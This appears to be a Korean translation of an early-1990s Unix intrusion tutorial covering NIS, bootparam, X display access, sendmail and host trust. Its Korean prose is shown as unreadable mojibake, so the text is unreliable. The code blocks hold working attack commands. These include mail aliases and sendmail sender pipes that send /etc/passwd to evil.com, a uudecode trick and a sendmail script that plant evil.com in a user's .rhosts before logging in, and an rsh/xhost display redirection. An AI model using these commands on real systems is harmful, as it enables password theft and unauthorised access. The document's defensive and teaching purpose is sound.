 À§ÀÇ °á°ú¸¦ º¸¸é¼­ ÀÌÁ¦ ¸ñÇ¥¹°¿¡ ´ëÇÑ »õ·Î¿î Á¤º¸µéÀ» ¾òÀ» ¼ö ÀÖ¾ú´Ù.
 Ã¹ ¹ø°·Î ¾òÀº °á°ú´Â ÀÌ°ÍÀÌ NIS server¶ó´Â °Í. ±×¸® ¸¹ÀÌ ¾Ë·ÁÁø °ÍÀº ¾Æ´ÏÁö¸¸ ¸¸¾à¿¡ ±× ¼­¹öÀÇ NISÀÇ µµ¸ÞÀÎ ³×ÀÓÀ» ¾Ë°ÔµÈ´Ù¸é, ÀÌÁ¦ ´Ü¼øÇÑ rpc-query·Î¼­ NISÀÇ mapÀ» ¾Ë ¼ö ÀÖ´Â °ÍÀÌ´Ù. µ¡ºÙ¿©¼­ ¿©·¯ Ãë¾àÇÏ°í »·ÇÑ password¸¦ ¾Ë¾Æ¸ÂÈ÷´Â °Í°ú ¸¶Âù°¡Áö·Î ¸¹Àº systemµéÀÌ ÃßÃø °¡´ÉÇÑ NIS µµ¸ÞÀÎ ³×ÀÓÀ» »ç¿ëÇÏ°í ÀÖ´Ù. µµ¸ÞÀÎ ³×ÀÓÀ» ¾Ë¾Æ¸ÂÈ÷´Â °ÍÀº ±²ÀåÇÑ ¼ÒµæÀ» °¡Á®¿Â´Ù. ÁÖ·Î »ç¿ëÇÏ´Â °ÍÀº hostnameÀÇ Àüü ¶Ç´Â ÀϺΠ(ÀÌ °æ¿ì "victim" À̳ª "victim.com" °°Àº °Í), ¶Ç´Â "showmount" ÇßÀ» ¶§ ³ªÅ¸³ª´Â Á¶Á÷À̳ª netgroupÀÇ À̸§. µîµîÀÌ´Ù. ¸¸ÀÏ ´ç½ÅÀÌ "victim" À̶ó´Â µµ¸ÞÀÎ ³×ÀÓÀ¸·Î ÃßÃøÇß´Ù¸é ´ÙÀ½°ú °°Àº ¹æ¹ýÀ¸·Î È®ÀÎÇÒ ¼ö ÀÖ´Ù.

<pre> evil % ypwhich -d victim victim.com Domain victim not bound  </pre>

 À§¿Í °°Àº °æ¿ì´Â ½ÇÆÐÇÑ °æ¿ìÀÌ´Ù. ¸¸¾à¿¡ ¸Â°Ô ÃßÃøÇß´Ù¸é victim.com ÀÇ NIS server °¡ °¡Áø hostnameÀ» ¹ÝȯÇØ ¿Ã °ÍÀÌ´Ù. ±×·±µ¥ NFS section¿¡¼­ victim.com ÀÌ "/var"¸¦ ¿ÜºÎ·Î ¹æÃâÇÑ´Ù´Â °ÍÀ» ÁÖ¸ñÇÏÀÚ. ÇØ¾ß ÇÒ ÀÏÀº ÀÌ µð·ºÅ丮¸¦ mount ÇÏ¿© ±× ¾ÈÀÇ "yp"-sub directory¸¦ µé¿©´Ùº¸´Â °Í»ÓÀÌ´Ù.

<pre> evil # mount victim.com:/var /foo evil # cd /foo evil # /bin/ls -alg /foo/yp total 17 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 . 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 .. 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar [...]  </pre>

 ÀÚ~ ÀÌ °æ¿ì "foo_bar" ÀÌ NIS µµ¸ÞÀÎ ³×ÀÓÀÌ µÈ´Ù.

 NIS mapÀº Á¾Á¾ user/emplyee µéÀÇ name¿¡ ´ëÇÑ ÁÁÀº Á¤º¸¸¦ °¡Áö°í ÀÖ´Ù. ¾ÆÁ÷ crackingÀ» À§ÇÑ password¿¡ ´ëÇؼ­´Â ¾ËÁö ¸øÇÑ´Ù.

 rpcinfo ·ÎºÎÅÍ ¾Ë¾Æ³½ ¶Ç ´Ù¸¥ »ç½ÇÀº victim.com ÀÌ rexd¸¦ »ç¿ëÇÑ´Ù´Â °ÍÀÌ´Ù. rsh ¿Í ¸¶Âù°¡Áö·Î rexd µµ "ÀÌ ¸í·ÉÀ» Àú user·Î½á ½ÇÇà½ÃÄÑ ÁÖ¼¼¿ä!" ÀÇ Çü½ÄÀ¸·Î ó¸®ÇÑ´Ù. ±×·¯³ª rsh¿Í´Â ´Ù¸£°Ô rexd ´Â client host°¡ hosts.quiiv ³ª .rhost files¿¡ À־ »ó°ü¾ø´Ù´Â °ÍÀÌ´Ù. ÀϹÝÀûÀ¸·Î rexd client programÀº "on" command »óÅÂÀÌÁö¸¸ Á¤ÇØÁöÁö ¾ÊÀº client host¿Í userid informationÀ» rexd server·Î º¸³»´Â µ¥´Â °£´ÜÇÑ C ÇÁ·Î±×·¥ÀÌ¸é µÈ´Ù. ÀÌ·¯ÇÑ ÀÌÀ¯·Î rexd¸¦ µ¹¸®´Â °ÍÀº password¸¦ °¡ÁöÁö ¾Ê´Â °ÍÀ̳ª ¸¶Âù°¡ÁöÀÌ´Ù. ¸ðµç security°¡ ±×°ÍÀÌ ¿ø·¡ ÀÖ¾î¾ß ÇÒ server¿¡ ÀÖ´Â ´ë½Å client ³»¿¡ ÀÖ°Ô µÈ´Ù.

 rpcinfo·ÎºÎÅÍ ÇÑ°¡Áö ´õ ¾Ë¾Æ³½ °ÍÀº victim.com ÀÌ diskless workstations ·Î¼­ °üÂûµÈ´Ù´Â Á¡ÀÌ´Ù. ÀÌ°ÍÀº bootparam service ·ÎºÎÅÍ ¾Ë¾Æ³¾ ¼ö Àִµ¥, ÀÌ°ÍÀÌ diskless client °¡ ºÎÆÃÇϴµ¥¿¡ ´ëÇÑ Á¤º¸¸¦ Á¦°øÇÑ´Ù. ¸¸¾à¿¡ BOOTPARAMPROC_WHOAMI ¿Í clientÀÇ ÁÖ¼Ò¸¦ ÀÌ¿ëÇÏ¿© Á¤È®È÷ Áú¹®ÇÑ´Ù¸é, ±×°ÍÀÇ NISÀÇ µµ¸ÞÀÎ ³×ÀÓÀ» ¾Ë ¼ö ÀÖÀ» °ÍÀÌ´Ù. NIS µµ¸ÞÀÎ ³×ÀÓÀ» ¾Ë¸é NIS mapÀ» ¾òÀ» ¼ö ÀÖ´Ù´Â »ç½ÇÀ» º¼ ¶§ ÀÌ°ÍÀº ¸Å¿ì À¯¿ëÇÑ ÀÛ¾÷ÀÌ µÉ °ÍÀÌ´Ù. ¾Æ·¡¿¡ ±×·± ¿ªÇÒÀ» ÇÏ´Â ÄÚµåÀÇ ÀϺΰ¡ ÀÖ´Ù.

<pre> char *server; struct bp_whoami_arg arg; /* query */ struct bp_whoami_res res; /* reply */ /* initializations omitted... */ callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC _ WHOAMI, xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res); printf("%s has nisdomain %s\n", server, res.domain_name);  </pre>

 Showmount ¸í·ÉÀÇ °á°ú¿¡¼­ "easy"·Î ³ªÅ¸³ª´Â °ÍÀº victim.com ÀÇ diskless client ÀÌ´Ù. µû¶ó¼­ ±×°ÍÀÇ client ÁÖ¼Ò¸¦ BOOTPARAMPROC_WHOAMI query ·Î »ç¿ëÇÑ´Ù.

<pre> evil % bootparam victim.com easy.victim.com victim.com has nisdomain foo_bar  </pre>

 NIS °ü¸®ÀÚµéÀº NIS domainÀÇ mail aliasµéÀ» Áú¹®¿¡ ÀÇÇÏ¿© °ü¸®ÇÑ´Ù. Local mail alias¿Í ¸¶Âù°¡Áö·Î ÀÌ °æ¿ì¿¡µµ ¸ÞÀÏÀÌ º¸³»Á³À» ¶§, ÁöÁ¤µÈ ¸í·ÉÀ» ½ÇÇàÇϵµ·Ï ¸¸µé ¼ö ÀÖ´Ù. ¿¹¸¦ µé¾î ´ç½ÅÀÌ "foo"¶ó´Â À̸§À» ¸¸µé¾ú´Ù°í ÇÏÀÚ, ±×·¯¸é ÀÌÁ¦ ±×´Â ±×¿¡°Ô ¾î¶² ¸Þ½ÃÁö¶óµµ µµÂøÇÏ´Â Áï½Ã password fileÀ» evil.com À¸·Î º¸³»¿Ã °ÍÀÌ´Ù.

<pre> nis-master # echo 'foo: "| mail zen at evil.com < /etc/passwd "' >> /etc/aliases nis-master # cd /var/yp nis-master # make aliases nis-master # echo test | mail -v foo at victim.com  </pre>

 À߸¸ µÇ¸é, AttackerµéÀº ´ç½ÅÀÇ NIS master host¸¦ Á¶ÀÛÇÒ ¼ö´Â ¾øÀ» °ÍÀÌ´Ù. ±×·¯³ª ¾Æ¹«¸® Àß µÈ´Ù ÇÏ´õ¶óµµ ±³ÈÆÀº ¸í¹éÇÏ´Ù. NIS´Â º¸Åë º¸¾È¿¡ ¾àÇϱ⠶§¹®¿¡ ¸¸¾à¿¡ Attacker°¡ ´ç½ÅÀÇ NIS master¸¦ Á¶ÀýÇÑ´Ù¸é, ±×´Â ÀÌÁ¦ client hostÀÇ Á¶ÀýÀ» °¡Áö°Ô µÉ °ÍÀÌ´Ù.

 NIS attackÀ» ¸·À» ¼ö ÀÖ´Â ¹æ¹ýÀº ±×¸® ¸¹ÀÌ ¾Ë·ÁÁ® ÀÖÁö´Â ¾Ê´Ù. ±×°ÍÀº client¿Í server °£¿¡ °ÅÀÇ ÀÎÁõÀÌ ÇÊ¿ä ¾ø´Â ºÒ¾ÈÀüÇÑ ¼­ºñ½ºÀ̱⠶§¹®ÀÌ´Ù. ´õ¿í ³ª»Û °ÍÀº ¾î¶² mapÀÌ¶óµµ ½ÉÁö¾î master server¿¡ ±îÁö ¹Ð¾î ³ÖÀ» ¼ö ÀÖ´Ù´Â °ÍÀÌ´Ù. (Áï ÀÌ ¸»Àº NIS server¸¦ client·Î Ãë±ÞÇÒ ¼ö ÀÖ´Ù´Â °ÍÀÌ´Ù.) ÀÌ·¸°Ô µÈ´Ù¸é ÀÌ°ÍÀº Àüü ±¸Á¶¸¦ ¿ÏÀüÈ÷ Àüº¹½ÃÅ°´Â °á°ú¸¦ ³ºÀ» °ÍÀÌ´Ù. NIS¸¦ »ç¿ëÇÏ´Â °ÍÀÌ ²À ÇÊ¿äÇÏ´Ù¸é ÃßÃøÇϱâ Èûµç µµ¸ÞÀÎ ³×ÀÓÀ» »ç¿ëÇÏ´Â °ÍÀÌ ¾à°£Àº µµ¿òÀÌ µÉ °ÍÀÌ´Ù. ÇÏÁö¸¸ ¸¸ÀÏ Attacker ¿¡°Ô ³ëÃâµÈ diskless client¸¦ µ¹¸®°í ÀÖ´Ù¸é ÀÌ·± °£´ÜÇÑ stepÀº °ø°ÝÀڵ鿡°Ô bootparam trick ¿¡ ÀÇÇØ ½±°Ô °£ÆÄ´çÇÒ °ÍÀÌ°í µµ¸ÞÀÎ ³×ÀÓÀ» ¾ò¾î°¥ °ÍÀÌ´Ù. ¸¸ÀÏ NIS°¡ password mapÀ» º¸±ÞÇϱâ À§ÇÑ ¿ëµµ·Î ¾²ÀÎ °ÍÀ̶ó¸é shadow password ¸¶Àúµµ ¹æ¾î¿¡ µµ¿òÀÌ µÇÁö ¾Ê´Âµ¥, ¿Ö³ÄÇϸé shadow mapµµ root¸¦ °¡Áø °ø°ÝÀڵ鿡 ÀÇÇØ ÀÐÈú ¼ö Àֱ⠶§¹®ÀÌ´Ù.
 °¡Àå ÁÁÀº °ÍÀº NIS¸¦ °¡´ÉÇÑ ÇÑ ÃÖ¼ÒÇÑ »ç¿ëÇÏ´Â °ÍÀÌ´Ù. ¾Æ´Ï¸é ÃÖ¼ÒÇÑ mapÀÌ Ä§ÀÔÀڵ鿡 ÀÇÇؼ­ Á¤µ¶µÉ ¼ö ÀÖ´Â °ÍÀ» ±ú´Þ¾Æ¾ß ÇÑ´Ù.

 RPC º¸¾ÈÀº ±× À§ÇèÀ» ÁÙÀ̱â À§ÇØ ¸¹Àº ³ë·ÂÀ» ÇÏ°í Àִµ¥, ±× ÀÚü¿¡ ¿ø·¡ ¹®Á¦¸¦ °¡Áö°í Àֱ⠶§¹®¿¡ »ó´çÈ÷ ¾î·Á¿î ÀÏÀÌ´Ù. °Ô´Ù°¡ ¾ÏÈ£ÇÐÀûÀÎ ¹æ¹ýµµ ±×¸® È¿°úÀûÀÌÁö ¸øÇÏ´Ù. Ç×°£¿¡ SunÀÇ »õ·Î¿î network information service ÀÎ NIS+°¡ ÀÌ·± ¹®Á¦µéÀ» °íÃÆ´Ù°í´Â Çϳª ¾ÆÁ÷±îÁö Sun À§¿¡¼­ µ¹¸®´Â °æ¿ì¿¡ ¸¸À¸·Î Á¦ÇѵǾî ÀÖ°í, µðÀÚÀÎ ÀÚüÀÇ ¼öÁ¤Àº ¾ÆÁ÷ ´Ù°¡°¡Áö ¸øÇÏ°í ÀÖ´Ù. ¸¶Áö¸·À¸·Î filtering-packetÀ̳ª 'securelib' ¶Ç´Â SunÀÇ 100482-02 patch¸¦ È°¿ëÇÏ´Â °ÍÀÌ µµ¿òÀÌ µÉ °ÍÀÌ´Ù.

 RPC service¿¡ ´ëÇؼ­´Â portmapper¸¸ÀÌ ¾Ë°í ÀÖ´Ù. ´Ù¸¥ ¸ðµç Network service´Â Æø·ÂÀûÀÎ ¹æ¹ýÀ¸·Î ¸ðµç Network port¿Í ¿¬°áµÇ¾î ÀÖÀ» ¼ö ÀÖ´Ù. ¸¹Àº ³×Æ®¿öÅ© À¯Æ¿¸®Æ¼¿Í windowing systemÀº ƯÁ¤ÇÑ port¸¦ »ç¿ëÇÑ´Ù (¿¹¸¦ µé¾î sendmail Àº port 25, telnetÀº port 23, X windows´Â port 6000 µî). SATAN(Security Analysis Tool for Auditing Networks)À» »ç¿ëÇϸé hostÀÇ port¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù. ¸ñÇ¥¹°¿¡ »ç¿ëÇغ¸ÀÚ.

<pre> evil % tcpmap victim.com Mapping 128.128.128.1 port 21: ftp port 23: telnet port 25: smtp port 37: time port 79: finger port 512: exec port 513: login port 514: shell port 515: printer port 6000: (X)  </pre>

 ÀÌ°ÍÀ» º¸¸é victim.com Àº X windows¸¦ µ¹¸®°í ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù. ¸¸ÀÏ À̰͵éÀÌ Á¦´ë·Î º¸È£µÇÁö ¾Ê´Â´Ù¸é (magic cookie ³ª xhost mechanismÀ» »ç¿ëÇÏ¿© º¸È£ÇÒ ¼ö ÀÖ´Ù.) windows È­¸éÀº ĸóµÇ°Å³ª userÀÇ Å¸ÀÌÇÎÀ» ÈÉÃij»¾î °üÂûµÉ ¼ö ÀÖÀ» °ÍÀÌ´Ù.
 ±×¸®°í ¸¸ÀÏ host°¡ X-window¸¦ ½ÇÇàÇÑ »óÅ¿¡¼­ telnetÀ» port 6000¿¡ ¹Þ¾ÆµéÀÎ´Ù¸é ±×°ÍÀ» ¼­ºñ½º °ÅºÎ attackÀ¸·Î »ç¿ëÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ÀÌ·¸°Ô µÇ¸é ¸ñÇ¥¹°ÀÇ windowing systemÀº Àá½Ãµ¿¾È "freeze-up" µÈ´Ù. X-server¸¦ °ø°ÝÇϱâ À§ÇÑ ÇÑ°¡Áö ¹æ¹ýÀº ±×°Í¿¡ XOpenDisplay() fucntionÀ» ÀÌ¿ëÇÏ¿© Á¢¼ÓÇÏ´Â °ÍÀÌ´Ù. ¸¸ÀÏ ±× functionÀÌ NULLÀ» return ÇÑ´Ù¸é victimÀÇ display¸¦ ÀÐ¾î ¿Ã ¼ö ¾ø´Ù´Â ¶æÀÌ µÈ´Ù.

<pre> char *hostname   if (XOpenDisplay(hostname) == NULL) { printf("Cannot open display: %s\n", hostname); } else { printf("Can open display: %s\n", hostname); } evil % opendisplay victim.com:0 Cannot open display: victim.com:0  </pre>

 X-terminalÀº UNIX system¿¡ ºñÇؼ­ ÈξÀ °­·ÂÇÏÁö ¸øÇϸ鼭µµ, ÀÚü º¸¾È¿¡ ¹®Á¦°¡ ÀÖÀ» ¼ö ÀÖ´Ù. ¸¹Àº X-terminalÀº Á¦ÇÑ ¾øÀÌ rsh access¸¦ Çã¶ôÇÑ´Ù. µû¶ó¼­ victimÀÇ terminal ¾È¿¡¼­ °á°ú°¡ ´ç½ÅÀÇ È­¸é¿¡ ³ªÅ¸³ª°Ô ÇÏ´Â X-client ÇÁ·Î±×·¥À» ½ÇÇà½Ãų ¼öµµ ÀÖ´Ù.

<pre> evil % xhost +xvictim.victim.com evil % rsh xvictim.victim.com telnet victim.com -display evil.com  </pre>

 ´ÙÀ½À¸·Î sendmailÀ» °Ë»çÇغ¸ÀÚ. Sendmail Àº ¾Æ¸¶µµ ¿À·¡Àü¿¡ machine À¸·Î ºÎÅÍ ¾ø¾îÁ³À» ºÒ¸í¿¹½º·± "wiz" ¸í·É¾î¿Í ´õºÒ¾î ¸Å¿ì ¿À·¡ ÀüºÎÅÍ º¸¾È ¹®Á¦¸¦ °¡Á®¿À´ø º¹ÀâÇÑ ÇÁ·Î±×·¥ÀÌ´Ù. ¶§¶§·Î target ¾Æ·¡·Î ¹öÀüÀ» ³·Ãß¾î °¡¸é¼­, OS¸¦ °áÁ¤ÇÏ¿© Sendmail¿¡ ÀÇÇØ µ¹¾Æ¿À´Â version number¸¦ °üÂûÇÏ´Â ¹æ¹ýÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù. ÀÌ·¸°Ô ÇÔÀ¸·Î½á hostÀÇ ¼ö¸¹Àº bugµéÁß ¾î´À °ÍÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ ÁÁÀ»Áö ¾Ë ¼ö ÀÖ´Ù. µ¡ºÙ¿©¼­ ¿ª½Ã º¸¾È»ó ¹®Á¦°¡ ¸¹Àº "decode"¸¦ µ¹¸®°í ÀÖ´Â ÁöÀÇ ¿©ºÎµµ ÆľÇÇÒ ¼ö°¡ ÀÖ´Ù.

<pre> evil % telnet victim.com 25 connecting to host victim.com (128.128.128.1.), port 25 connection open 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT expn decode 250 <"|/usr/bin/uudecode"> quit  </pre>

 "decode"¸¦ »ç¿ëÇÏ´Â °ÍÀº º¸¾È»óÀÇ À§ÇèÀ» Áö´Ï°í ÀÖ´Ù. ÀÌ°ÍÀ» ÀÌ¿ëÇؼ­ attackerµéÀº owner°¡ °¡Áø ¸ðµç writable fileÀ» overwrite ÇÒ ¼ö ÀÖ´Â ÀáÀç·ÂÀ» °¡Áö°Ô µÈ´Ù. ¾Æ·¡ÀÇ mailÀ» º¸¸é ÀÌ°ÍÀº (writable ÇÏ´Ù¸é) user zenÀÇ .rhost ³»¿¡ "evil.com"À» À§Ä¡½Ãų °ÍÀÌ´Ù.

<pre> evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode at victim.com  </pre>

 ¸¸¾à¿¡ ¸ðµç home-directory °¡ ¾Ë·ÁÁöÁö ¾Ê¾Ò°Å³ª ȤÀº writableÇÏÁö ¾Ê´Ù¸é, ´ç½ÅÀÌ ¸ñÇ¥¹°¿¡¼­ ½ÇÇàÇÏ°í ½ÍÀº ¸í·ÉÀ» ´ãÀº alias¸¦ Æ÷ÇÔÇÑ °¡Â¥ /etc/aliases.pag¸¦ »ý¼ºÇÏ´Â º¯Ä¢Àû ¹æ¹ýÀ» ÀÌ¿ëÇÒ ¼ö ÀÖ´Ù.

<pre> evil % cat decode bin: "| cat /etc/passwd | mail zen at evil.com" evil % newaliases -oQ/tmp -oA`pwd`/decode evil % uuencode decode.pag /etc/aliases.pag | mail decode at victom.com evil % /usr/lib/sendmail -fbin -om -oi bin at victim.com < /dev/null  </pre>

 ´Ü¼øÈ÷ sendmailÀ» ÀÌ¿ëÇؼ­ address°¡ acceptable ÇÑÁö (vrfy) ¶Ç´Â address°¡ ¾î¶»°Ô È®ÀåµÇ¾î ÀÖ´ÂÁö (expn)¸¦ ¹¯´Â °Í¸¸À¸·Îµµ ¸¹Àº Á¤º¸¸¦ ¾Ë¾Æ³¾ ¼ö ÀÖ´Ù. finger³ª rusers ¼­ºñ½º°¡ Á¦°øµÇÁö ¾Ê´Â °æ¿ì¿¡µµ vrfy¿Í expnÀ» ÀÌ¿ëÇÒ ¼ö ÀÖ´Ù. ¶Ç ÀÌ°ÍÀ» ÀÌ¿ëÇؼ­ user°¡, ¾Ç¿ëµÉ ¼ö ÀÖ´Â program (¿¹¸¦ µé¾î, vacation, mail sorters µîµî) À¸·Î mailÀ» Àü¼ÛÇÏ°í ÀÖ´ÂÁöÀÇ ¿©ºÎµµ ¾Ë ¼ö ÀÖ´Ù.
 º¸¾ÈÀ» À§ÇØ vrfy¿Í expn ¸í·ÉÀ» Á¦°ÅÇÏ´Â °Íµµ ÁÁÀº ¹æ¹ýÀÌ´Ù. ÃÖ±ÙÀÇ ¹öÀü¿¡¼­ srvrsmtp.c ÀÇ ¼Ò½ºÄڵ带 º¸¸é CmdTab structure¿¡¼­ "vrfy"¿Í "expn"À̶ó´Â ¹®ÀÚ¸¦ °¡Áø µÎ ÁÙ¸¸ Á¦°ÅÇϰųª ¹Ù²Ù¸é µÈ´Ù.
 SendmailÀÇ ÃֽŠ¹öÀüÀ» ¾ò´Â °Íµµ ¸Å¿ì ÁÁÀº ¹æ¹ýÀÌ´Ù. ÀÌÀü ¹öÀüÀÇ sendmail Àº ±× ¾î¶²UNIX ÇÁ·Î±×·¥º¸´Ùµµ ¸¹Àº bug report¸¦ °¡Áö°í ÀÖÀ» °ÍÀÌ´Ù.

 Sendmail-sendoff¿¡¼­, Á¡°ËÇØ¾ß ÇÒ °Í Áß¿¡, ²Ï ¸¹ÀÌ ¾Ë·ÁÁø µÎ °¡ÁöÀÇ ¹ö±×°¡ ÀÖ´Ù. ù ¹ø° °ÍÀº ¹öŬ¸®·ÎºÎÅÍ ¹öÀü 5.59¿¡¼­ °íÃÄÁø °ÍÀε¥, ¾Æ·¡ÀÇ ¸Þ½ÃÁö¿¡µµ ºÒ±¸ÇÏ°í 5.59 ÀÌÇÏÀÇ ¹öÀü¿¡¼­´Â ¿¡·¯ ¸Þ½ÃÁö¿Í »ó°ü¾øÀÌ Æ¯Á¤ ÆÄÀÏ¿¡ "evil.com" ÀÌ Ãß°¡µÈ´Ù.

<pre> % cat evil_sendmail telnet victim.com 25 << EOSM rcpt to: /home/zen/.rhosts mail from: zen data random garbage . rcpt to: /home/zen/.rhosts mail from: zen data evil.com . quit EOSM evil % /bin/sh evil_sendmail Trying 128.128.128.1 Connected to victim.com Escape character is '^]'. Connection closed by foreign host. evil % rlogin victim.com -l zen Welcome to victim.com! victim %  </pre>

 µÎ ¹ø° ¹ö±×´Â, ÃÖ±Ù¿¡¾ß ºñ·Î¼Ò °íÃÄÁø °ÍÀε¥, sender ³ª destination address ¿¡ ´ëÇÏ¿© ´©±¸µçÁö ƯÁ¤ÇÑ shell commmand ³ª pathname¿¡ Á¢±ÙÇÒ ¼ö ÀÖ´Ù´Â °ÍÀÌ´Ù. ÀÌ°Í¿¡ ´ëÇÑ ÀÚ¼¼ÇÑ ºñ¹ÐÀ» À¯ÁöÇÏ´Â °ÍÀº Çê¼ö°í³ª ´Ù¸§¾øÀ¸¸ç, mailing list³ª usenet news group¸¦ ÅëÇÑ discussionÀº ÀÌ ¹ö±×¸¦ ¾î¶»°Ô È°¿ëÇÒ °ÍÀÎÁö¿¡ ´ëÇÑ Æø·Î°¡ µÇ¾î¹ö¸± ¼öµµ ÀÖ´Â °ÍÀÌ´Ù. ÀÌ°Í¿¡ ´ëÇÏ¿© ÀÚ¼¼È÷ À̾߱âÇÏ´Â °ÍÀº ¹«¸®À̱⠶§¹®¿¡, ÀÌ°ÍÀ» ÀÌ¿ëÇÑ ÀüÇüÀûÀÎ attackingÀ» ¾Æ·¡¿¡ ¼Ò°³ÇÏ¿´´Ù.

<pre> evil % telnet victim.com 25 Trying 128.128.128.1... Connected to victim.com Escape character is '^]'. 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail zen at evil.com < /etc/passwd" 250 "|/bin/mail zen at evil.com < /etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself 250 Mail accepted quit Connection closed by foreign host. evil %  </pre>

* ÀÌ ±ÛÀ» ¾´ ½ÃÁ¡¿¡¼­ sendmailÀÇ ¹öÀü 8.6.4¸¸ÀÌ ÃÖ½ÅÀÇ ¹ö±×¸¦ ¸ðµÎ ¼öÁ¤ÇÑ °ÍÀ¸·Î º¸°íµÇ¾ú´Ù.

¡Ý Trust

 ÀÌÁ¦ ħÀÔ¿¡ ´ëÇÑ ¸¶Áö¸· ÁÖÁ¦·Î ³Ñ¾î¿Ô´Ù. À̷νá À̶§±îÁö Çß´ø ½ÇÁ¦ÀûÀÎ ¹æ¹ý°ú´Â Á¶±Ý ´Ù¸¥, Á»´õ À̷п¡ Ãæ½ÇÇÑ Àü·«À» °øºÎÇÏ°Ô µÉ °ÍÀÌ´Ù. ±×¸®°í trustÀÇ °³³ä¿¡ ´ëÇØ Àá±ñ ¾ð±ÞÇÏ°Ú´Ù. Vulnerabilities ¿¡ ´ëÇÑ °³³ä°ú °üÁ¡Àº ¿ì¸®°¡ Áö±Ý±îÁö ´Ù·ç¾î¿Ô´ø °Íº¸´Ù ´õ ¹Ì¹¦ÇÏ°í, ´Ù°¡°¡±â¿¡ ¾ÆÁ÷ ¸Õ °Å¸®¿¡ ÀÖ´Ù. ÀÌ ±Û¿¡¼­ trust¶ó´Â ´Ü¾î¸¦ ¾²´Â °æ¿ì´Â "server°¡ º¸Åë password °Ë»ç°¡ ÁöÁ¡¿¡¼­ password °Ë»ç ¾øÀÌ Æ¯Á¤ÇÑ client¸¦ local ÀÚ¿ø¿¡ Á¢±ÙÇϵµ·Ï Çã¶ôÇÒ ¶§" ¶ó´Â Àǹ̿¡¼­ »ç¿ëÇÒ °ÍÀÌ´Ù. ´Ù½Ã ¸»Çؼ­ ¾ÕÀ¸·Î ±× client ·Î À§ÀåÇÏ´Â °Í¿¡ ´ëÇÑ ¼³¸íÀ¸·Î ÁÖÁ¦¸¦ Á¦ÇÑÇÒ ¼ö ÀÖ´Ù.

 ¸¹Àº °æ¿ì¿¡ hostÀÇ trust°¡ ÀÌ·ç¾îÁö´Âµ¥ - .rhosts ¿Í host.equiv ÆÄÀÏÀ» ÅëÇÏ¿© password verification ¾øÀÌ access°¡ °¡´ÉÇÏ°Ô ÇÒ ¼ö ÀÖ´Ù. window serverµéÀº remote system ÀÌ ½±°Ô Ư±ÇÀ» »ç¿ëÇÏ°í ¶Ç ³²¿ëÇϵµ·Ï Çã¶ôÇÏ°í ÀÖ´Ù.

 ÀÌ·± ¸ðµç °ÍµéÀº °ÅÀÇ ´ëºÎºÐ clientÀÇ IP address ¿¡ ÀÇ°ÅÇÏ¿© service °¡ Á¦°øµÇ´ÂÁö ¾Æ´ÑÁö¸¦ °áÁ¤ÇÑ´Ù. °¡Àå ´Ü¼øÇÑ ¹æ¹ýÀº /etc/hosts ÆÄÀÏÀ» Á÷Á¢ÀûÀÎ lookupÀ¸·Î »ç¿ëÇÏ°Ô ÇÏ´Â °ÍÀÌ´Ù. ±×·¯³ª ¿äÁîÀ½Àº ´ëºÎºÐÀÇ host¿¡¼­ DNS(Domain Name Service)³ª NIS, ¶Ç´Â µÎ °¡Áö¸¦ ¸ðµÎ loopup¿¡ »ç¿ëÇÑ´Ù. Server°¡ IP-address¸¦ °¡Áö°í client hostname°ú ¸ÂÃß¾î º¼ ¶§ Reverse lookupÀÌ ¹ß»ýÇÑ´Ù.

 Host trust¿¡ ´ëÇؼ­ ´ëºÎºÐÀÇ system administratorµéÀÌ ±× °³³äÀ» Àß ÀÌÇØÇÏ°í ÀÖ´Ù°í ÇÏÁö¸¸ ¾ÆÁ÷µµ ÃæºÐÇÑ À§Ç輺°ú, ½ÇÁ¦ »ç¿ë½ÃÀÇ ¹®Á¦°¡, (hostnameÀÇ Èä³»¿Í »ó°ü¾øÀÌ), ³²¾ÆÀÖ´Ù. ±×¸®°í ÀÌ°ÍÀº ¿ì¸®°¡ ÀÎÅͳݿ¡¼­ ´Ù·ç´Â ¸ðµç °Í Áß¿¡¼­ °¡Àå ÀÌÇØ°¡ ´ú µÈ ºÎºÐÀÌ´Ù.

 ¸ðµç ÇüÅÂÀÇ trust´Â À§Á¶µÇ°í, ¼ÓÀÓ¼öÀÌÀÚ, Æı«ÀûÀÏ ¼ö ÀÖ´Ù. ƯÈ÷ clientÀÇ ½Å¿ëµµ¸¦ checkÇÏ´Â authority °¡ serverÀÇ ¿ÜºÎ¿¡ ÀÖÀ» ¶§, ¶Ç´Â ±× ¸ÞÄ¿´ÏÁòÀÌ ºó¾àÇÑ authentication À§¿¡ ÀÖÀ» ¶§, µÎ °æ¿ì ´Ù ¹®Á¦°¡ µÈ´Ù.

